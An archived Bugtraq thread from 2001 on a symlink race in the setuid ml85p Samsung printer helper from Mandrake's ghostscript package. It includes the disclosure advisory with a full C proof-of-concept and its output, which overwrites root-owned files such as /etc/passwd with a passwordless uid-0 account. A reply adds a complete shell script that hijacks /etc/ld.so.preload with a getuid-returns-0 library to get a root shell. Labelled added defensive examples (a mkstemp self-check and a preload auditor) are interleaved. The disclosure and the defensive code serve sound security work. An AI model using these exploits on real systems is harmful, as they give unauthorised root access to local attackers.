6756271 2001-07-16 23:42 -0600  /260 lines/  <aleph1@securityfocus.com>
Sent by: joel@lysator.liu.se
Imported: 2001-07-17  08:14  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18024>
Subject: Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake: ghostscript package)
------------------------------------------------------------
From: aleph1@securityfocus.com
To: bugtraq@securityfocus.com
Message-ID: <20010716234230.O9567@securityfocus.com>

----- Forwarded message from Charles Stevenson <core@ezlink.com> -----

From: Charles Stevenson <core@ezlink.com>
To: Bugtraq <bugtraq@securityfocus.com>, chmouel@mandrakesoft.com
CC: Kevin Finisterre <dotslash@snosoft.com>
Subject: Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake: ghostscript package)
Date: Tue, 10 Jul 2001 16:27:39 -0600
Message-ID: <3B4B815B.B1A65869@ezlink.com>

NOTE TO MODERATOR: PLEASE HOLD UNTIL 16 JULY 2001 TO ALLOW VENDOR TIME
TO RELEASE AN UPDATE

Author(s): Charles Stevenson, core at ezlink dot com
           Kevin Finisterre, dotslash at snosoft dot com

Date Published: 2001 JULY 16

Revision: 1.0

Advisory ID: N/A

Bugtraq ID: 3008

CVE CAN: None currently assigned.

Title: ml85p Linux Helper Binary for Samsung ML-85G Printer Insecure
Temporary File Creation

Class: Insecure Temporary File Creation Race Condition

Remotely Exploitable: No

Locally Exploitable: Yes

Vulnerability Description:  

The Samsung ML-85G GDI printer driver (helper binary to me;) suffers
from insecure temporary file creation practices.  It is possible to
create files as root which can lead to root access.

Vulnerable Systems: 

This exploit should be specific to the x86 architecture although rare
cases may exist (the symlink attack is not platform dependent).  All
systems running ml85p built from tarball are assumed to be
vulnerable.  ml85p is also distributed by MandrakeSoft in the
ghostscript RPM.  The permissions are more stringent and would
require sys privileges.  I tested it on ml85p built from the tarball
on my Debian system and Kevin tested on his Mandrake system.

> [d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p
> -rwsr-x---    1 root     sys         11676 Mar 30 11:43 /usr/bin/ml85p*

Mandrake:

ghostscript-5.50-71mdk.i586.rpm
ghostscript-5.50-67mdk.i586.rpm
ghostscript-5.50-67mdk.i586.rpm

Solution/Vendor Information/Workaround: 

The author's site and the source code can be found at: 

http://members.nbci.com/rpragana/gdiprinters.html

Recommended fix... use mkstemp() instead of the homegrown code:

line 726:                       sprintf(gname,"/tmp/ml85g%d",time(0));

Quick fix... chmod 0755 `which ml85p`

Vendor notified on: 2001 JULY 10

Credits: 

The credit goes to my good friend Kevin Finisterre for discovering
the vulnerability, I (Charles Stevenson) wrote the proof-of-concept
exploit.

This advisory was drafted with the help of the SecurityFocus.com
Vulnerability Help Team. For more information or assistance drafting 
advisories please mail vulnhelp@securityfocus.com.

Technical Description - Exploit/Concept Code: 

[-(core@devastator:~/bleedingedge)> ./ml85p-xpl /etc/rc.owned
owned::0:0:root:/root:/bin/bash
ml85p-xpl.c by core (c) 2001
> backing up /etc/rc.owned to /tmp/ez.n6ZT1m
/bin/cp: cannot stat `/etc/rc.owned': No such file or directory
/bin/touch: getting attributes of `/etc/rc.owned': No such file or
directory
> creating a lot of symlinks
Running a few times since I'm lazy.
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
-rw-rw-rw-    1 root     staff           0 Jul 10 13:14 /etc/rc.owned
-rw-rw-rw-    1 root     staff          32 Jul 10 13:14 /etc/rc.owned
owned::0:0:root:/root:/bin/bash
> cleaning up
Don't forget to `cp /tmp/ez.n6ZT1m /etc/rc.owned && touch -r
/tmp/ez.n6ZT1m /etc/rc.owned`!
All done. Enjoy!

You'll want to download this from my website or take care to
reconstruct the lines which got wrapped.

http://www.ezlink.com/~core/hot/ml85p-xpl.c

/* ml85p-xpl.c
 *
 * Quick hack to exploit ml85p
 *
 * Simply run it with the file you want to create/overwrite
 * and the data you wish to place in the file.
 *
 * Example:
 *
 * $ gcc -g -Wall ml85p-xpl.c -o ml85p-xpl
 * $ ./ml85p-xpl /etc/passwd owned::0:0:root:/root:/bin/bash
 *
 * Then login as owned... etc..
 *
 * by Charles Stevenson <core@ezlink.com>
 *
 * July 10 2001
 *
 * exploit discovered by KF <dotslash@snosoft.com>
 *
 * shoutz b10z and word to Kevin for the quick tag team :)
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#include <time.h>

#define TEMPFILE "/tmp/ez.XXXXXX"
#define BRUTE 10

void usage(char*);

int main(int argc, char **argv){
   char tempfile[128] = TEMPFILE;
   int fd, i;
   time_t the_time;
   char temp[512];
   
   if (argc < 3){
      usage(argv[0]);
   }

   if((fd = mkstemp(tempfile))==-1){
      fprintf(stderr, "Error creating %s!\n",tempfile);
      exit(1);
   }

   /* begin lazy slacker coding */
   fprintf(stderr, "ml85p-xpl.c by core (c) 2001\n");
   fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);

   /* backup old file */
   sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
   system(temp);
   
   /* set the date/time */
   sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
   system(temp);

   the_time = time(NULL);

   fprintf(stderr, "> creating a lot of symlinks\n");

   for (i=0;i<BRUTE;i++){
      sprintf(temp, "/tmp/ml85g%d", the_time+i);
      symlink(argv[1], temp);
   }
   
   sprintf(temp, \
     "echo \"b1nary 0utlawz\">file; umask 000 && ml85p -sf file\n", \
     argv[2]);
   fprintf(stderr, "Running a few times since I'm lazy.\n");
   for (i=0;i<BRUTE;i++){
      system(temp);
   }

   sprintf(temp, "/bin/ls -l %s", argv[1]);
   system(temp);

   sprintf(temp, "echo \"%s\" > %s", argv[2], argv[1]);
   system(temp);

   sprintf(temp, "/bin/ls -l %s", argv[1]);
   system(temp);

   sprintf(temp, "/bin/cat %s", argv[1]);
   system(temp);

   fprintf(stderr, "> cleaning up\n");
   sprintf(temp, "/bin/rm -f /tmp/ml85*");
   system(temp);

   fprintf(stderr, \
     "Don't forget to `cp %s %s && touch -r %s %s`!\n",tempfile,\
     argv[1], tempfile, argv[1]);
   
   fprintf(stderr, "All done. Enjoy!\n");
   return 0;
}

void usage(char *name){
   
   fprintf(stderr, "usage: %s <filename> <data>\n", name);
   exit(1);
}

/* EOF */

Disclaimer: 

The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an as is
condition.  There are no warranties with regard to this
information. In no event shall the author(s) be liable for any
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the
user's own risk.

----- End forwarded message -----

-- 
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum
(6756271) / <aleph1@securityfocus.com>/---(Rewrapped)
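The advisory recommends mkstemp() in place of the time(0)-derived name built on line 726. The following is an added example, not code from the advisory, from ml85p or from its author: the guessable-name opener beside the mkstemp() replacement and an O_EXCL|O_NOFOLLOW fallback for cases where a fixed name cannot be avoided, with a self-check that plants a symlink in a private scratch directory under /tmp and reports which opener writes through it. The open() flags in the weak version and the scratch paths are assumptions; the advisory quotes only the sprintf.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <time.h>
#include <unistd.h>
/* ml85p's pattern (advisory, line 726): name built from time(0), then opened
 * for writing; a plain O_CREAT open follows a symlink planted at that
 * guessable name, writing the link target with the setuid helper's rights.
 * Assumed: the open() flags (the advisory quotes only the sprintf). 'dir'
 * stands in for "/tmp" so the self-check can use a private directory. */
static int open_spool_predictable(const char *dir, time_t stamp,
                                  char *path, size_t n)
{
    snprintf(path, n, "%s/ml85g%ld", dir, (long)stamp);
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* The advisory's fix: mkstemp() fills XXXXXX with an unguessable suffix
 * and opens with O_CREAT|O_EXCL, so it never opens a pre-existing file or
 * symlink. Keep using the returned fd rather than reopening by name. */
static int open_spool_mkstemp(const char *dir, char *path, size_t n)
{
    snprintf(path, n, "%s/ml85gXXXXXX", dir);
    return mkstemp(path);
}

/* Where a fixed name cannot be avoided, O_EXCL|O_NOFOLLOW makes the open
 * fail (EEXIST or ELOOP) instead of writing through a planted link. */
static int open_spool_excl(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

enum {
    PREDICTABLE_FOLLOWED_LINK = 1, /* weak opener wrote the victim file */
    EXCL_REFUSED_LINK         = 2, /* O_EXCL|O_NOFOLLOW refused the link */
    MKSTEMP_FRESH_FILE        = 4  /* mkstemp created a new regular file */
};

/* Self-check: in a private mkdtemp() directory, plant a symlink at the
 * guessable name pointing at a not-yet-existing "victim" file, then try
 * each opener. Returns a bitmask of the flags above, -1 on setup failure. */
int run_symlink_check(void)
{
    char dir[] = "/tmp/spoolcheckXXXXXX";
    char victim[256], planted[256], path[256];
    struct stat st;
    int result = 0, fd;
    time_t stamp = time(NULL);

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(planted, sizeof planted, "%s/ml85g%ld", dir, (long)stamp);
    if (symlink(victim, planted) != 0) { rmdir(dir); return -1; }

    /* 1. guessable name: victim is created and written through the link */
    fd = open_spool_predictable(dir, stamp, path, sizeof path);
    if (fd >= 0) {
        if (write(fd, "x", 1) == 1 && stat(victim, &st) == 0 && st.st_size == 1)
            result |= PREDICTABLE_FOLLOWED_LINK;
        close(fd);
    }

    /* 2. same name, O_EXCL|O_NOFOLLOW: the open must fail */
    fd = open_spool_excl(planted);
    if (fd < 0 && (errno == EEXIST || errno == ELOOP))
        result |= EXCL_REFUSED_LINK;
    else if (fd >= 0)
        close(fd);

    /* 3. mkstemp(): a different name and a brand-new regular file */
    fd = open_spool_mkstemp(dir, path, sizeof path);
    if (fd >= 0) {
        if (strcmp(path, planted) != 0 && lstat(path, &st) == 0 && S_ISREG(st.st_mode))
            result |= MKSTEMP_FRESH_FILE;
        close(fd);
        unlink(path);
    }

    unlink(victim);
    unlink(planted);
    rmdir(dir);
    return result;
}

int main(void)
{
    int r = run_symlink_check();
    printf("weak opener followed link: %d, O_EXCL refused: %d, mkstemp fresh: %d\n",
           !!(r & PREDICTABLE_FOLLOWED_LINK), !!(r & EXCL_REFUSED_LINK),
           !!(r & MKSTEMP_FRESH_FILE));
    return r < 0;
}
```

Compile with `gcc -Wall check.c -o check` and run it as an unprivileged user; all three answers come out 1. The point of keeping the fd from mkstemp() rather than the name is that the race the advisory describes is between name generation and open; once the file is open under an O_EXCL-created name, later writes go to that inode whatever appears in /tmp afterwards.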
6760669  2001-07-17 18:35 +0000  /69 lines/  <suid@sneakerz.org>
Sent by: joel@lysator.liu.se
Imported: 2001-07-17  22:02  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <18048>
Subject: Re: Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake: ghostscript package)
------------------------------------------------------------
From: suid@sneakerz.org
To: bugtraq@securityfocus.com
Message-ID: <200107171826.f6HIQjP18606@jawa.chilli.net.au>

Why code the exploit in C if you were just going to sprintf();
system() everything anyway? This is a bad exploit for a lame bug. I
found this in April and wrote this exploit to muck around with
/etc/ld.so.preload as a means of elevating privileges from symlink
attacks locally. Old news but still. This ml85 bug appears in Linux
Mandrake 8.0. Thing is, this program is mode 4750 root:sys so
whatever...

suid

----

#!/bin/sh
# Exploit using /usr/bin/ml85p default setuid program on 
# Mandrake Linux 8.0
#
# You need to be in the sys group to be able to execute 
# ml85p.

echo "** ml85p exploit"
# set the required umask
umask 0

# get the number of seconds since 1970
DATE=`date +"%s"`
if [ ! -u /usr/bin/ml85p ] || [ ! -x /usr/bin/ml85p ]
then
	echo "** this exploit requires that /usr/bin/ml85p is setuid and executable."
	exit 1
fi

if [ ! -e /etc/ld.so.preload ] || [ ! -w /etc/ld.so.preload ]
then
	echo "** this exploit requires that /etc/ld.so.preload does not exist."
	exit 1
fi

echo "** creating file"
ln -s /etc/ld.so.preload /tmp/ml85g"$DATE"
echo "bleh" | /usr/bin/ml85p -s
rm /tmp/ml85g"$DATE"

echo "** creating shared library"
cat << _EOF_ > /tmp/g.c
int getuid(void) { return(0); }
_EOF_

echo "** compiling and linking shared object"
gcc -c -o /tmp/g.o /tmp/g.c
ld -shared -o /tmp/g.so /tmp/g.o
rm -f /tmp/g.c /tmp/g.o

echo "** rigging ld.so.preload"
echo "/tmp/g.so" > /etc/ld.so.preload
echo "** execute su. warning all getuid() calls will return(0) until you remove"
echo "** the line \"/tmp/g.so\" from /etc/ld.so.preload. removing /tmp/g.so without"
echo "** first fixing /etc/ld.so.preload may result in system malfunction"
su -
echo "** cleaning up"
> /etc/ld.so.preload
rm -f /tmp/g.so
(6760669) / <suid@sneakerz.org>/----------(Rewrapped)
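The reply's script turns the file write into root by pointing /etc/ld.so.preload at a library under /tmp. As an added example (not suid's script or any distribution's tooling), the audit below classifies each entry of a preload file by the properties a legitimate entry has: an absolute path, a regular file, owned by a trusted uid, not group- or world-writable, and located under a trusted library directory. The trusted prefixes and owner are parameters so the self-check can run against a constructed file in a scratch directory under /tmp; in production they would be the system library directories and root, and the healthy state is for /etc/ld.so.preload not to exist at all. The file syntax assumed (entries separated by whitespace or ':', '#' starting a comment) is glibc's.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
/* Why an entry fails; PRELOAD_OK means it passed every check. */
enum {
    PRELOAD_OK = 0,
    PRELOAD_NOT_ABSOLUTE,  /* not a full path */
    PRELOAD_MISSING,       /* lstat() failed: dangling entry */
    PRELOAD_NOT_REGULAR,   /* symlink, directory, device ... */
    PRELOAD_WRONG_OWNER,   /* not owned by trusted_uid */
    PRELOAD_WRITABLE,      /* group- or world-writable object */
    PRELOAD_UNTRUSTED_DIR  /* outside every trusted prefix, e.g. /tmp */
};

/* Classify one entry. trusted_dirs is a NULL-terminated list of directory
 * prefixes (in production the system library directories); trusted_uid is
 * the owner every preloaded object must have (in production root). */
int classify_preload_entry(const char *entry, const char *const *trusted_dirs,
                           uid_t trusted_uid)
{
    struct stat st;
    if (entry[0] != '/')                  return PRELOAD_NOT_ABSOLUTE;
    if (lstat(entry, &st) != 0)           return PRELOAD_MISSING;
    if (!S_ISREG(st.st_mode))             return PRELOAD_NOT_REGULAR;
    if (st.st_uid != trusted_uid)         return PRELOAD_WRONG_OWNER;
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return PRELOAD_WRITABLE;
    for (; *trusted_dirs != NULL; trusted_dirs++) {
        size_t n = strlen(*trusted_dirs);
        if (strncmp(entry, *trusted_dirs, n) == 0 && entry[n] == '/')
            return PRELOAD_OK;
    }
    return PRELOAD_UNTRUSTED_DIR;
}

/* Read a preload file the way glibc's ld.so does (entries separated by
 * whitespace or ':', '#' starts a comment) and count entries that fail.
 * No file at all is the healthy state and counts as 0; -1 means the file
 * exists but could not be read. */
int audit_preload_file(const char *path, const char *const *trusted_dirs,
                       uid_t trusted_uid)
{
    char line[1024];
    int bad = 0;
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return access(path, F_OK) != 0 ? 0 : -1;
    while (fgets(line, sizeof line, f) != NULL) {
        char *hash = strchr(line, '#');
        if (hash != NULL)
            *hash = '\0';
        for (char *tok = strtok(line, " \t\r\n:"); tok != NULL;
             tok = strtok(NULL, " \t\r\n:")) {
            int why = classify_preload_entry(tok, trusted_dirs, trusted_uid);
            if (why != PRELOAD_OK) {
                fprintf(stderr, "suspicious preload entry %s (reason %d)\n", tok, why);
                bad++;
            }
        }
    }
    fclose(f);
    return bad;
}

/* Self-check on a constructed preload file in a private scratch directory:
 * a comment, one sound object under the trusted prefix, one world-writable
 * object outside it (the /tmp/g.so shape from the reply) and one dangling
 * entry. Returns the number of entries flagged. */
int run_preload_check(void)
{
    char dir[] = "/tmp/preloadcheckXXXXXX";
    char trusted[256], good[256], bad[256], preload[256], body[1024];
    const char *trusted_dirs[2] = { trusted, NULL };
    int fd, flagged;
    ssize_t w;
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(trusted, sizeof trusted, "%s/lib", dir);
    snprintf(good, sizeof good, "%s/lib/libgood.so", dir);
    snprintf(bad, sizeof bad, "%s/g.so", dir);
    snprintf(preload, sizeof preload, "%s/ld.so.preload", dir);
    mkdir(trusted, 0755);
    if ((fd = open(good, O_WRONLY | O_CREAT, 0644)) >= 0) { close(fd); chmod(good, 0644); }
    if ((fd = open(bad, O_WRONLY | O_CREAT, 0666)) >= 0) { close(fd); chmod(bad, 0666); }
    snprintf(body, sizeof body, "# constructed for the check\n%s\n%s\n%s/missing.so\n",
             good, bad, dir);
    if ((fd = open(preload, O_WRONLY | O_CREAT, 0644)) >= 0) {
        w = write(fd, body, strlen(body)); (void)w;
        close(fd);
    }
    flagged = audit_preload_file(preload, trusted_dirs, getuid());
    unlink(preload); unlink(good); unlink(bad);
    rmdir(trusted); rmdir(dir);
    return flagged;
}
```

To use this against the real file, call `audit_preload_file("/etc/ld.so.preload", dirs, 0)` with `dirs` set to the system library directories of the host in question; the two entries the self-check flags are the world-writable object outside the trusted prefix and the dangling one, while the comment and the well-placed object pass.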